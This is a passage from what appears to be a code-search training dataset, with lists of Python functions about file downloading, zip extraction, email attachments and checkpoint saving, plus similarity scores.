"def get_server_logs(self):\n self.response.content\n binary_body = re.split('--==.*==', self.response.content)[2].split('\\r\\n')[5]\n\n f = StringIO.StringIO()\n f.write(bytearray(binary_body))\n\n memory_zip = ZipFile(f)\n zip_content = {name: memory_zip.read(name) for name in memory_zip.namelist()}\n oracc_log = zip_content['oracc.log']\n request_log = zip_content['request.log']\n\n # Check if server returns a lemmatised file\n autolem = None \n for key, value in zip_content.iteritems():\n if key.endswith(\"autolem.atf\"):\n autolem = value\n\n print zip_content.keys()\n print \"@\"*30\n print oracc_log\n print \"@\"*30\n print request_log\n print \"@\"*30\n if autolem:\n print autolem\n print \"@\"*30\n\n return oracc_log, request_log, autolem",
"def on_get(self, req, resp):\n resp.set_header('Content-Type', 'text/json')\n tif_paths = encode.get_files_in_directory(DIARIES_TO_ENCODE_DIR, \".tif\")\n zip_paths = encode.get_files_in_directory(DIARIES_TO_ENCODE_DIR, \".zip\")\n diaries_paths = tif_paths + zip_paths\n def extract_file_name(path): return os.path.basename(path)\n resp.body = json.dumps({\"diaries\": list(map(extract_file_name, diaries_paths)),\n \"diaries_paths\": diaries_paths})",
"def get_archive(katfilenames):\n\timport requests\n\n\tfile_refs = []\n\tfor filename in katfilenames:\n\t\tif filename.startswith('s3'):\n\t\t\tres = requests.post(S3_URL, headers=S3_HEAD, data='{\"s3_ref\":\"%s\",\"ref_key\":\"Nope\"}'%(filename,))\n\t\t\turl = res.json()['url']\n\t\t\tres1 = requests.get(url)\n\t\t\toutfile = filename.split('/')[-1]\n\t\t\topen(outfile, 'wb').write(res1.content)\n\t\t\tfile_refs.append(outfile)\n\t\telse:\n\t\t\tfile_refs.append(filename)\n\treturn file_refs",
"def __get_raw_content(self, response):\n\n files = response.get('files')\n\n for f in files:\n file_data = files.get(f)\n if file_data.get('truncated'):\n r = requests.get(file_data.get('raw_url'))\n file_data.update({\n 'content': str(r.content, 'utf-8')\n })\n\n return response",
"def download_attachments(output_path, urls):\r\n locations = []\r\n for url in urls:\r\n path = urlparse(url).path\r\n #teardown path and rebuild to negate any errors with\r\n #os.path.join and leading /'s\r\n path = path.split('/')\r\n filename = path.pop(-1)\r\n localpath = ''\r\n for item in path:\r\n localpath = os.path.join(localpath, item)\r\n full_path = os.path.join(output_path, localpath)\r\n if not os.path.exists(full_path):\r\n os.makedirs(full_path)\r\n print('downloading {}'.format(filename))\r\n try:\r\n urlretrieve(url, os.path.join(full_path, filename))\r\n locations.append(os.path.join(localpath, filename))\r\n except URLError as e:\r\n error = (\"No file could be downloaded from {}; Error {}\"\r\n .format(url, e))\r\n logger.warning(error)\r\n except IOError as e: #Python 2.7 throws an IOError rather Than URLError\r\n # For japanese, the error might look kind of like this:\r\n # e = IOError( 'socket error', socket.error(111, u'\\u63a5\\u7d9a\\u3092\\u62d2\\u5426\\u3055\\u308c\\u307e\\u3057\\u305f') )\r\n # and not be suitable to use in \"{}\".format(e) , raising UnicodeDecodeError\r\n # (This is at least the case on my Fedora running Python 2.7.5 \r\n # (default, Feb 19 2014, 13:47:28) [GCC 4.8.2 20131212 (Red Hat 4.8.2-7)] on linux2\r\n try:\r\n error = (\"No file could be downloaded from {}; Error {}\"\r\n .format(url, e))\r\n except UnicodeDecodeError:\r\n # For lack of a better log message because we could not decode e, let's use repr(e)\r\n error = (\"No file could be downloaded from {}; Error {}\"\r\n .format(url, repr(e)))\r\n logger.warning(error)\r\n return locations",
"def get_file_list(compressed_file, PATHstr, client_id):\n\n home = os.getenv(\"HOME\")\n client_path = home + '/client-logs/' + str(client_id) + '/'\n logger.debug('Function Successful: % s',\n 'get_file_list: get_file_list successfully called from process_doc', extra=d)\n\n logger.debug('Calling Function: % s',\n 'get_file_list: get_file_list calling ZipFile', extra=d)\n files = zipfile.ZipFile(compressed_file, \"r\")\n logger.debug('Function Successful: % s',\n 'get_file_list: get_file_list successfully called ZipFile', extra=d)\n\n logger.debug('Calling Function: % s',\n 'get_file_list: get_file_list calling extractall', extra=d)\n files.extractall(PATHstr)\n logger.debug('Function Successful: % s',\n 'get_file_list: get_file_list successfully called extractall', extra=d)\n\n # Create a list of all the files in the directory\n logger.debug('Calling Function: % s',\n 'get_file_list: get_file_list calling listdir', extra=d)\n file_list = os.listdir(PATHstr)\n logger.debug('Function Successful: % s',\n 'get_file_list: get_file_list successfully called listdir', extra=d)\n\n final_list = []\n logger.debug('Loop: %s', 'get_file_list: loop through the files', extra=d)\n for file in file_list:\n if file.startswith(\"doc.\"):\n final_list.append(file)\n elif file.endswith(\".log\"):\n if not os.path.exists(client_path):\n os.makedirs(client_path)\n shutil.copy(PATHstr + file, client_path)\n else:\n shutil.copy(PATHstr + file, client_path)\n logger.debug('Loop successful: %s', 'get_file_list: successfully looped through the files', extra=d)\n\n logger.debug('Returning: %s',\n 'get_file_list: returning list of files', extra=d)\n return final_list, PATHstr",
"def on_post(self, req, resp):\n LOGGER = logging.getLogger()\n \n resp.set_header('Content-Type', 'text/json')\n raw_json = req.stream.read().decode('utf-8')\n content = json.loads(raw_json, encoding='utf-8')\n\n try:\n files = content.get(\"files\")\n zip_name = content.get(\"name\")\n zip_file = DownloadFilesResource.compress_files(files, zip_name)\n resp.body = json.dumps({'file': zip_file})\n LOGGER.info(\"Zip created and ready to download\")\n except Exception as e:\n LOGGER.error(\"Error creating zip file\" , exc_info=True)\n raise falcon.HTTPInternalServerError(title=\"Error downloading files: \" + str(type(e)),\n description=(str(e) +\n ','.join(traceback.format_tb(e.__traceback__))))",
"def attachments(self):\n for part in self.email.walk():\n filename = part.get_filename()\n if filename:\n yield {\n 'type': part.get_content_type(),\n 'name': filename,\n 'content': part.get_payload()\n }",
"def write_zip_content(content, out_path):\n textract_ext = ('.doc', '.docx', '.epub', '.gif', '.htm', '.html', '.odt', '.pdf', '.rtf', '.txt')\n z = zipfile.ZipFile(BytesIO(content))\n unzipped_file_list = z.filelist\n if not unzipped_file_list:\n # if the archive's corrupted, this list is empty\n return\n try:\n z.extractall(out_path)\n except RuntimeError:\n # occurs on password protected archives\n return\n file_list = []\n for f in unzipped_file_list:\n try:\n file_name = f.filename\n if not file_name.endswith('/'):\n file_out_path = os.path.join(out_path, file_name)\n if file_out_path.endswith(textract_ext):\n file_list.append(file_out_path)\n else:\n # capturing as non-machine\n file_list.append(file_out_path)\n except AttributeError:\n pass\n file_list = [os.path.join(out_path, os.path.basename(f)) for f in file_list]\n\n return file_list",
"def web_archive_batch():\n\n try:\n auth_check()\n except Exception as e:\n return flask.redirect(str(e))\n\n batch = set()\n\n if 'archiveFile' in flask.request.files:\n file = flask.request.files['archiveFile']\n if file.filename != '':\n if file and allowed_file(file.filename):\n downloaded = [\n line.decode('utf-8').rstrip('\\n').split(' ')[1]\n for line in file.readlines()\n ]\n archived = db_get_archived()\n\n for video_id in archived:\n if video_id not in downloaded:\n batch.add(video_id)\n else:\n archived = db_get_archived()\n\n for video_id in archived:\n batch.add(video_id)\n\n return flask.Response('\\n'.join(list(batch)),\n mimetype = 'text/plain',\n headers = { 'Content-Disposition': 'attachment;filename=batch.txt' }\n )",
"def download_test_files(request):\n\n # Log the start of the function\n logger.info(\"=========== returns ms1 test files from code directory input/ms1\")\n\n # create an absolute path to the 'example_data_dir' containing the test data files, then create\n # absolute paths to each test data file. Note the test data files are located in this code base.\n example_data_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),'..','..','input/ms1')\n pos_input = os.path.join(example_data_dir, example_pos_filename)\n neg_input = os.path.join(example_data_dir, example_neg_filename)\n tracer_file = os.path.join(example_data_dir, example_tracer_filename)\n run_sequence_pos_file = os.path.join(example_data_dir, example_run_sequence_pos_filename)\n run_sequence_neg_file = os.path.join(example_data_dir, example_run_sequence_neg_filename)\n\n # create filenames\n filename1 = 'ms1_pos_input_test_data.csv'\n filename2 = 'ms1_neg_input_test_data.csv'\n filename3 = 'ms1_tracer_test_data.csv'\n filename4 = 'ms1_run_sequence_pos_test_data.csv'\n filename5 = 'ms1_run_sequence_neg_test_data.csv'\n\n # List of files to be zipped\n files_to_zip = {filename1: pos_input, filename2: neg_input, filename3: tracer_file, filename4: run_sequence_pos_file, filename5: run_sequence_neg_file}\n\n # Create an in-memory zip file\n in_memory_zip = BytesIO()\n with ZipFile(in_memory_zip, 'w', ZIP_DEFLATED) as zipf:\n # Add each file to the zipfile\n for filename in files_to_zip:\n logger.info('filename: {}'.format(filename))\n file_path = files_to_zip[filename]\n with open(file_path, 'rb') as file:\n file_content = file.read()\n zipf.writestr(filename, file_content)\n # The ZipFile object is automatically closed when exiting the 'with' block\n\n zip_filename = \"ms1_test_data_files.zip\"\n # Create an HTTP response with the zip file attached for download\n response = HttpResponse(in_memory_zip.getvalue(),content_type='application/zip')\n response['Content-Disposition'] = 'attachment; filename=' + zip_filename\n response['Content-length'] = in_memory_zip.tell()\n\n # Return the HTTP response\n return response",
"def _add_tag_files(\n zip_file, dir_name, payload_info_list, payload_byte_count, payload_file_count\n):\n tag_info_list = []\n _add_tag_file(zip_file, dir_name, tag_info_list, _gen_bagit_text_file_tup())\n _add_tag_file(\n zip_file,\n dir_name,\n tag_info_list,\n _gen_bag_info_file_tup(payload_byte_count, payload_file_count),\n )\n _add_tag_file(\n zip_file, dir_name, tag_info_list, _gen_pid_mapping_file_tup(payload_info_list)\n )\n return tag_info_list",
"def process_files(exp_folders):\n pool = mp.Pool()\n results = pool.imap_unordered(read_and_serialize, exp_folders)\n\n stat = []\n for res in results:\n print(res)\n stat.append(res)\n\n pool.close()\n pool.join()",
"def get_files(self):\n # self.folder= +str(int(time.time()))\n if not os.path.exists(self.folder):\n os.mkdir(self.folder)\n while len(self.url_queue): # If we have URLs to crawl - we crawl\n href = self.url_queue.popleft() # We grab a URL from the left of the list\n filename = href.rsplit('/', 1)[-1]\n print(\"Downloading %s to %s...\" % (href, filename))\n fullname = os.path.join(self.folder, filename)\n urlretrieve(href, fullname)\n self.xlfnames.append(filename)",
"def collect_attachments(self, paths_or_urls: Iterable[str]) -> List[Tuple[str, str, str, bytes]]:\n attachments = []\n same_content = [] # type: List[bytes]\n for src in paths_or_urls:\n try:\n content = self.load_file(src)\n except ImageNotFound as err:\n self.log_error(err)\n self.conditionally_raise(err)\n continue\n content_hash = hashlib.md5(content).digest()\n if content_hash in same_content:\n continue\n same_content.append(content_hash)\n maintype, subtype = self._get_mime_type(src)\n filename = os.path.basename(src)\n attachments.append((maintype, subtype, filename, content))\n return attachments",
"def _download_file(self, video_objects):\n downloaded_video = []\n path=\"media/\"\n for video_object in video_objects:\n if 'contentUrl' in video_object.keys() and video_object['contentUrl']!='':\n \n url = video_object['contentUrl']\n filename = url.split('/')[-1]\n r = requests.get(url, stream=True)\n \n with open(filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk:\n f.write(chunk)\n\n path+=filename\n return path",
"def getFiles(directory):\n # os.listdir only for locally downloaded files\n _files=[]\n for item in os.listdir(directory):\n path = os.path.join(directory, item)\n if not os.path.isdir(path) and \".lhe.gz\" in path:\n _files.append(path)\n elif os.path.isdir(path):\n getFiles(path)\n return _files",
"def parse_attachments(request):\n attachments = []\n for attachment in request.files.getlist('attachment'):\n attachments.append(Attachment(attachment.filename, attachment))\n return attachments",
"def extract(request):\n try:\n files = request.FILES.getlist('myFile')\n msg_data = []\n fs = FileSystemStorage()\n for file in files:\n name = file.name.replace(\" \", \"_\")\n if os.path.exists(settings.MEDIA_ROOT + \"\\\\\" + name):\n os.remove(settings.MEDIA_ROOT + \"\\\\\" + name)\n fs.save(settings.MEDIA_ROOT + \"\\\\\" + name, file)\n msg = extract_msg.Message(settings.MEDIA_ROOT + \"\\\\\" + name)\n msg.save_attachments(customPath=settings.MEDIA_ROOT + \"\\\\\")\n attachments = []\n for i in range(0, len(msg.attachments)):\n attachments.append({\n \"filename\": msg.attachments[i].shortFilename,\n \"filepath\": \"/media/\" + msg.attachments[i].shortFilename\n })\n msg_data.append({\n # \"mainProperties\": msg.mainProperties,\n # \"header\": msg.header,\n \"attachments\": attachments,\n \"filename\": file.name,\n \"filepath\": \"/media/\" + name,\n \"from\": msg.sender,\n \"to\": msg.to,\n \"cc\": msg.cc,\n \"subject\": msg.subject,\n \"date\": msg.date,\n \"body\": msg.body,\n })\n msg.close()\n response = {\n \"response\": \"SUCCESS\",\n \"message\": \"File Uploaded!\",\n \"data\": msg_data\n }\n except:\n response = {\n \"response\": \"FAIL\",\n \"message\": \"Erorr in file uploading!\",\n \"data\": msg_data\n }\n return Response(response)",
"def output_files(self):\n o = []\n if 'unweighted' in self.event_types:\n o.append(self.name + \"_unweighted_events.lhe.gz\")\n if 'weighted' in self.event_types:\n o.append(self.name + \"_events.lhe.gz\")\n return o",
"def extract_files(self, *filenames):\n for filename in filenames:\n data = self.read_file(filename)\n f = open(filename, 'wb')\n f.write(data or b'')\n f.close()",
"def _add_payload_files(zip_file, payload_info_list):\n payload_byte_count = 0\n payload_file_count = 0\n for payload_info_dict in payload_info_list:\n zip_file.write_iter(payload_info_dict[\"path\"], payload_info_dict[\"iter\"])\n payload_byte_count += payload_info_dict[\"iter\"].size\n payload_file_count += 1\n return payload_byte_count, payload_file_count",
"def save_attachments_in_doc(self, doc):\n\t\tsaved_attachments = []\n\n\t\tfor attachment in self.attachments:\n\t\t\ttry:\n\t\t\t\tfile_data = save_file(attachment['fname'], attachment['fcontent'],\n\t\t\t\t\tdoc.doctype, doc.name, is_private=1)\n\t\t\t\tsaved_attachments.append(file_data)\n\n\t\t\t\tif attachment['fname'] in self.cid_map:\n\t\t\t\t\tself.cid_map[file_data.name] = self.cid_map[attachment['fname']]\n\n\t\t\texcept MaxFileSizeReachedError:\n\t\t\t\t# WARNING: bypass max file size exception\n\t\t\t\tpass\n\t\t\texcept frappe.DuplicateEntryError:\n\t\t\t\t# same file attached twice??\n\t\t\t\tpass\n\n\t\treturn saved_attachments",
"def ParseFiles(self, responses):\n # Note that some of these Find requests will fail because some paths don't\n # exist, e.g. Chromium on most machines, so we don't check for success.\n if responses:\n for response in responses:\n client_path = db.ClientPath.FromPathSpec(self.client_id,\n response.stat_entry.pathspec)\n filepath = response.stat_entry.pathspec.CollapsePath()\n fd = file_store.OpenFile(client_path)\n hist = chrome_history.ChromeParser()\n count = 0\n for epoch64, dtype, url, dat1, dat2, dat3 in hist.Parse(filepath, fd):\n count += 1\n str_entry = \"%s %s %s %s %s %s\" % (datetime.datetime.utcfromtimestamp(\n epoch64 / 1e6), url, dat1, dat2, dat3, dtype)\n self.SendReply(rdfvalue.RDFString(str_entry))\n\n self.Log(\"Wrote %d Chrome History entries for user %s from %s\", count,\n self.args.username, response.stat_entry.pathspec.Basename())\n self.state.hist_count += count"
] |
[
"0.5935676",
"0.5921422",
"0.590038",
"0.5832488",
"0.58300406",
"0.5676737",
"0.561249",
"0.55952454",
"0.55590147",
"0.5538954",
"0.55148673",
"0.5504614",
"0.5495929",
"0.54576784",
"0.54488444",
"0.5446717",
"0.5422017",
"0.5404831",
"0.54028255",
"0.5400352",
"0.5391549",
"0.53905374",
"0.53765124",
"0.53757644",
"0.53697354",
"0.5363725",
"0.53434485",
"0.5337164",
"0.5327103",
"0.5322667"
] |
0.62589914
|
0
|
Check if a given mimetype is eligible for further processing Returns true of false
|
def check_eligible_mimetype(self, ctype, uid):
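        # Accept only the archive and XML content types that DMARC aggregate reports are commonly delivered as.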
        self.helper.log_debug(
            'check_eligible_mimetype: checking content-type %s of msg uid %s' %
            (ctype, uid))
if ctype == "application/zip":
return True
elif ctype == "application/gzip":
return True
elif ctype == "application/x-gzip":
return True
elif ctype == "application/octet-stream":
# Non-standard mimetype used by Amazon SES dmarc reports
return True
elif ctype == "application-x-gzip":
# Non-standard mimetype used by Comcast dmarc reports
return True
elif ctype == "application/x-zip-compressed":
# Non-standard mimetype used by Yahoo dmarc reports
return True
elif ctype == "application/xml":
return True
elif ctype == "text/xml":
return True
else:
            self.helper.log_debug(
                'check_eligible_mimetype: skipping content-type %s of msg uid %s' %
                (ctype, uid))
return False
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _check_mimetype(self):\n if self.mimetype in Config.aliases:\n mimetype = Config.aliases[self.mimetype]\n else:\n mimetype = self.mimetype\n expected_extensions = mimetypes.guess_all_extensions(mimetype,\n strict=False)\n if expected_extensions:\n if self.has_extension and self.extension not in expected_extensions:\n # LOG: improve this string\n self.make_dangerous('expected extensions')",
"def is_accept_type(file_name):\n bare_name, file_extension = os.path.splitext(file_name)\n for ext in ACCEPTED_FILES:\n if file_extension.lower() == ext:\n return True\n return False",
"def is_binary_file_mime_type(mime_type, cfg):\n if mime_type:\n # We require explicit handling of the web-friendly images.\n # For all other types, pattern-matching is used.\n if is_viewable_image(mime_type):\n return mime_type in cfg.options.binary_mime_types\n for pattern in cfg.options.binary_mime_types:\n if fnmatch.fnmatch(mime_type, pattern):\n return True\n return False",
"def check_file_type(fname):\n ext = path.splitext(fname)[1]\n return ext in allowed_extensions",
"def allowed_file_type(file_name):\n\treturn file_name.lower().endswith(ALLOWED_FILE_TYPES)",
"def is_file_type(file_path, file_type):\n\n if not file_exists(file_path):\n return False\n\n if file_path.endswith(file_type):\n return True\n\n return False",
"def _check_extension(self):\n if self.extension in Config.override_ext:\n expected_mimetype = Config.override_ext[self.extension]\n else:\n expected_mimetype, encoding = mimetypes.guess_type(self.src_path,\n strict=False)\n if expected_mimetype in Config.aliases:\n expected_mimetype = Config.aliases[expected_mimetype]\n is_known_extension = self.extension in mimetypes.types_map.keys()\n if is_known_extension and expected_mimetype != self.mimetype:\n # LOG: improve this string\n self.make_dangerous('expected_mimetype')",
"def _check_url_file_type(headers: Dict[str, str]) -> Optional[str]:\n content_type = headers.get(\"content-type\", \"\").lower()\n file_type = None\n\n for extension in SUPPORTED_MIME_TYPES.keys():\n for mime_type in SUPPORTED_MIME_TYPES.get(extension, []):\n if mime_type in content_type:\n file_type = extension\n break\n\n return file_type",
"def supportedType(request, video_types):\n return request.FILES['file'].content_type in video_types.keys()",
"def validate_image_type(filename: str) -> bool:\n supported_extensions = (\"png\", \"jpg\", \"jpeg\")\n return (filename not in (None, \"\")) and (get_extension(filename) in supported_extensions)",
"def secure_filetype(file):\n ext_list = ['png', 'jpg', 'jpeg']\n ext_valid = file.filename.split('.')[-1] in ext_list\n\n mimetype_list = [\"image/jpeg\", \"image/jpg\", \"image/png\"]\n mimetype_valid = file.mimetype in mimetype_list\n\n return ext_valid and mimetype_valid",
"def canProcess(self, event, meta):\n if len(self.subscribe) and event not in self.subscribe:\n return False\n\n if len(self.mime) and meta.has_key('getcontenttype'):\n nodeMime = meta['getcontenttype']\n for mime in self.mime:\n if nodeMime.startswith(mime):\n return True\n return False\n\n return True",
"def _IsIgnoredFileType(filename):\n for extension in _IGNORE_FILETYPES_FOR_MINIDUMP_PULLS:\n if filename.endswith(extension):\n return True\n return False",
"def _IsIgnoredFileType(filename):\n for extension in _IGNORE_FILETYPES_FOR_MINIDUMP_PULLS:\n if filename.endswith(extension):\n return True\n return False",
"def is_file_type_error(self):\n return self._tag == 'file_type_error'",
"def _accept_for_flag (self, filename):\n\t\troot, ext = os.path.splitext(filename)\n\t\tif not ext:\n\t\t\treturn 1\n\t\telse:\n\t\t\tbinary_extensions = ['.jpg', '.gif', '.png', '.jar' ]\n\t\t\treturn ext not in ['.bak', '.off','.old', '.works', '.clean', '.obs', '.log', '.db'] + binary_extensions",
"def validFiles(self, files):\n for myfile in files:\n if not ( ( myfile.get_uri_scheme() == 'file' ) or \\\n ( myfile.get_uri_scheme() == 'smb' ) ):\n return False\n elif ( not myfile.get_mime_type() in self.oootypes ) and \\\n ( not myfile.get_mime_type() in self.plaintypes ):\n return False\n return True",
"def images_media_filter(hash_str, mime_type):\n return mime_type in MIME_TO_EXTESION_MAPPING",
"def valid_media_type(media_type):\n return media_type in ACCEPTED_MEDIA_TYPES",
"def is_filetype(img_path, formats=[\"jpg\", \"png\", \"gif\", \"pgm\", \"tif\", \"ppm\"]):\n # formats = [\"jpg\", \"png\", \"gif\", \"pgm\"]\n end = img_path[-3:]\n return os.path.isfile(img_path) and (end in formats)",
"def is_image(content_type):\n return content_type == \"image/jpeg\" or content_type == \"image/png\"",
"def file_allowed(self):\n if self._allowed_ext:\n if self.get_ext() not in self._allowed_ext:\n return False\n \n return True",
"def is_file(self):\n return self.type == \"file\"",
"def check_media_file_type(media_file_class):\n if media_file_class == 'AudioFile':\n media_file_type = 'Audio file'\n elif media_file_class == 'VideoFile':\n media_file_type = 'Video file'\n elif media_file_class == 'DocumentFile':\n media_file_type = 'Document file'\n elif media_file_class == 'ImageFile':\n media_file_type = 'Image file'\n\n return media_file_type",
"def check_type(filename):\n try:\n im = Image.read(filename)\n except SanperaError:\n return False\n else:\n return im.original_format in [b'JPEG', b'PNG', b'GIF']",
"def check_file(file: UploadFile) -> bool:\n # accept all image, video and audio types\n mimetype = mimetypes.guess_type(file.filename)[0]\n if mimetype is not None and mimetype.split(\"/\")[0] in {\"image\", \"audio\", \"video\"}:\n return True\n # if not, only accept whitelisted file extensions\n ext = os.path.splitext(file.filename)[1]\n if ext not in settings.FILE_EXTENSION_WHITELIST:\n raise FileValidationError(f\"{file.filename} is an invalid file type\")\n return True",
"def is_filetype(filename=None, search_str=None):\n if not search_str:\n return False\n results = puremagic.magic_file(filename)\n for result in results:\n if search_str.lower() in result.name.lower():\n return True\n return False",
"def is_processable_file(file_name):\n return str(file_name).endswith(PROCESSABLE_FILES)",
"def _file_can_be_compressed(filename):\n content_type = ''\n with open(filename, 'rb') as f:\n content_type = _get_content_type(f)\n return content_type in TEXT_TYPES",
"def is_image(self):\r\n # we can only get this if we have headers\r\n LOG.debug('content type')\r\n LOG.debug(self.content_type)\r\n if (self.content_type is not None and\r\n self.content_type.lower() in IMAGE_TYPES.values()):\r\n return True\r\n else:\r\n return False"
] |
[
"0.73119986",
"0.6826056",
"0.6730636",
"0.67149067",
"0.6682556",
"0.6661485",
"0.66420454",
"0.6575386",
"0.6550504",
"0.6504457",
"0.65020347",
"0.65004003",
"0.6454048",
"0.6454048",
"0.6450731",
"0.6439068",
"0.642226",
"0.6412332",
"0.64115924",
"0.63734996",
"0.63124907",
"0.6291791",
"0.6290675",
"0.6289728",
"0.6279121",
"0.62504053",
"0.6194957",
"0.6188165",
"0.6187862",
"0.61877674"
] |
0.7656266
|
0
|
Save checkpointing info for a given uid and msg struct
|
def save_check_point(self, uid, msg):
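        # Build a checkpoint key unique to the server, account and message uid, and store a human-readable value with the message timestamp and subject.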
key = "%s_%s_%s" % (self.opt_pop3_server,
self.opt_global_account["username"], uid)
date = email.utils.mktime_tz(email.utils.parsedate_tz(msg.get('Date')))
value = "input=dmarc_pop, server=%s, username=%s, uid=%s, timestamp_utc=%d, subject='%s'" % (
self.opt_pop3_server, self.opt_global_account["username"], uid, date, msg.get('Subject'))
try:
self.helper.save_check_point(key, value)
except Exception as e:
raise Exception(
"Error saving checkpoint data with with exception %s" %
str(e))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def save_to_checkpoint(self, chkpt):\n chkpt[self.name] = self.state_dict()",
"def checkpoint():",
"def save_checkpoint(self, value):\n try:\n __method_name = inspect.currentframe().f_code.co_name\n self.state.post(json.dumps({\"from\": value}))\n self.applogger.info(\n '{}(method={}) : {} : successfully saved checkpoint. from=\"{}\"'.format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name, value\n )\n )\n except Exception as ex:\n self.applogger.exception(\n '{}(method={}) : {} : Unexpected error while saving checkpoint: err=\"{}\"'.format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name, str(ex)\n )\n )\n raise Exception(ex)",
"def save_checkpoint(self, checkpoint: str) -> str:\n\n # Some model might need to aggregate variables during checkpointing\n # which requires both the chief and workers to participate in the\n # allreduce communication protocol.\n # So we need to call get_state on every remote workers, otherwise\n # it might get stuck\n state_refs = [w.get_state.remote() for w in self.remote_workers]\n\n state = ray.get(state_refs[0])\n\n with open(checkpoint, \"wb\") as f:\n SafePickle.dump(state, f)\n\n return checkpoint",
"def checkpoint(self):\n save()",
"def save_checkpoint_snapshot(self, value):\n try:\n __method_name = inspect.currentframe().f_code.co_name\n self.state.post(json.dumps({\"snapshot\": value}))\n self.applogger.info(\n \"{}(method={}) : {} : successfully saved checkpoint.\".format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name\n )\n )\n except Exception as ex:\n self.applogger.exception(\n '{}(method={}) : {} : Unexpected error while saving checkpoint: err=\"{}\"'.format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name, str(ex)\n )\n )\n raise Exception(ex)",
"def saveCheckpoint(self):\n time_stamp = time.strftime('%Y%m%d%H%M%S', time.gmtime())\n state_filename = os.path.join(self.saving_dir, 'checkpoint.' + time_stamp + '.pth.tar')\n mem_filename = os.path.join(self.saving_dir, 'memory.' + time_stamp + '.pth.tar')\n state = self.getSavingState()\n memory = {\n 'memory': self.memory\n }\n torch.save(state, state_filename)\n torch.save(memory, mem_filename)",
"def save(self, checkpoint_path: str):\r\n raise NotImplementedError",
"def save_checkpoint(self):\n checkpoin_path = self.get_checkpoint_path()\n _logger.info('Save checkpoint ignored by tuner, checkpoint path: %s', checkpoin_path)",
"def save_checkpoint(self, folder='checkpoint', filename='checkpoint.pth.tar'):\n data = dict()\n data[\"inst\"] = \"save\"\n data[\"folder\"] = folder\n data[\"filename\"] = filename\n\n q_idx, data_id = self.put(data, q_idx=0) # Send instruction to first nnet\n self.get(q_idx, data_id) # Blocks here\n\n # Done",
"def save_checkpoint(self, checkpoint_info):\n torch.save(checkpoint_info, os.path.join(self.checkpoint_path, self.checkpoint_file))",
"def save_ckpt(self, name=None):\r\n if name is None:\r\n save_path = os.path.join(self.model_dir, \"ckpt_epoch{}.pth\".format(self.clock.epoch))\r\n print(\"Checkpoint saved at {}\".format(save_path))\r\n else:\r\n save_path = os.path.join(self.model_dir, \"{}.pth\".format(name))\r\n if isinstance(self.net, nn.DataParallel):\r\n torch.save({\r\n 'clock': self.clock.make_checkpoint(),\r\n 'model_state_dict': self.net.module.cpu().state_dict(),\r\n 'optimizer_state_dict': self.optimizer.state_dict(),\r\n 'scheduler_state_dict': self.scheduler.state_dict(),\r\n }, save_path)\r\n else:\r\n torch.save({\r\n 'clock': self.clock.make_checkpoint(),\r\n 'model_state_dict': self.net.cpu().state_dict(),\r\n 'optimizer_state_dict': self.optimizer.state_dict(),\r\n 'scheduler_state_dict': self.scheduler.state_dict(),\r\n }, save_path)\r\n self.net.cuda()",
"def checkpoint_save(self, epoch, model, label=None, checkpoint=None, path=\"\"):\n\n if label is None:\n label = f\"checkpoint-{epoch}\"\n else:\n label = f\"{label}-checkpoint-{epoch}\"\n\n if checkpoint is None:\n pass\n elif checkpoint == -1:\n Potentials.save(model=model, label=label, path=path)\n elif epoch % checkpoint == 0:\n Potentials.save(model=model, label=label, path=path)",
"def create_checkpoint(self):\n checkpoint_id = uuid.uuid4()\n self.checkpoints.append(checkpoint_id)\n self.journal_data[checkpoint_id] = {}\n return checkpoint_id",
"def save_checkpoint(self, label):\n model_dir = os.path.join(\n config.results_dir, config.experiment_name, 'checkpoints')\n os.makedirs(model_dir, exist_ok=True)\n model_file = os.path.join(model_dir, '{}_net.pth.tar'.format(label))\n\n model_dict = {'net_state_dict': self.net.state_dict(),\n 'use_cuda': self.use_cuda}\n\n print(\"Saving model to {}\".format(model_file))\n torch.save(model_dict, model_file)",
"def save_msg(self, msg: TrafficSigns):\n if msg.sub_messages:\n tf = self.get_transformation(\n \"sim_world\",\n msg.header.frame_id,\n msg.sub_messages[0].header.stamp,\n timeout=rospy.Duration(0.1),\n )\n if tf is not None:\n rospy.logdebug(f\"point before transformation {msg.sub_messages}\")\n points = [\n (tf * Point(m.pose.position), self.name_conversion[m.type])\n for m in msg.sub_messages\n ]\n for point, class_desc in points:\n self.add_detection(point, class_desc)\n self.publish_counter += 1\n self._publish_point_marker(point, self.publish_counter)\n else:\n rospy.logerr(\n f\"Error: could not get a transformation, message: {msg.sub_messages}\"\n )",
"def storeReceipt(self, uid, msg, receipt):\n # check is message is read on user message box\n path = os.path.join(self.userMessageBox(self.getUuidFromUid(uid)), msg)\n log(logging.DEBUG, \"Verifying read status of message \" + msg + \" on \" + path)\n if not os.path.exists(path):\n log(logging.ERROR, \"Message doesn't exist on user message box\")\n return\n # try to find message patterns\n matches = re.match(\"_?([a-f]|[0-9]){8}-([a-f]|[0-9]){4}-([a-f]|[0-9]){4}-([a-f]|[0-9]){4}-([a-f]|[0-9]){12}_[0-9]+\", msg)\n if not matches:\n log(logging.ERROR, \"Internal error, wrong message file name format!\")\n return\n # spilt by \"_\"\n msg_id_parts = str.split(str(msg), \"_\")\n log(logging.DEBUG, \"Message to be stored parts: \" + str(msg_id_parts))\n # path for new file\n if len(msg_id_parts) == 2:\n log(logging.ERROR, \"Message not read\")\n return\n # path = os.path.join(self.userReceiptBox(msg_id_parts[0]), \"_%s_%s_%d\" % (self.getUuidFromUid(uid), msg_id_parts[1], time.time() * 1000))\n else:\n path = os.path.join(self.userReceiptBox(msg_id_parts[1]), \"_%s_%s_%d\" % (self.getUuidFromUid(uid), msg_id_parts[2], time.time() * 1000))\n # save new file\n try:\n log(logging.INFO, \"Saving receipt at \" + path)\n self.saveOnFile(path, json.dumps(receipt))\n except:\n logging.exception(\"Cannot create receipt file\")",
"def save_checkpoint(state, filename):\n torch.save(state, filename) # save checkpoint",
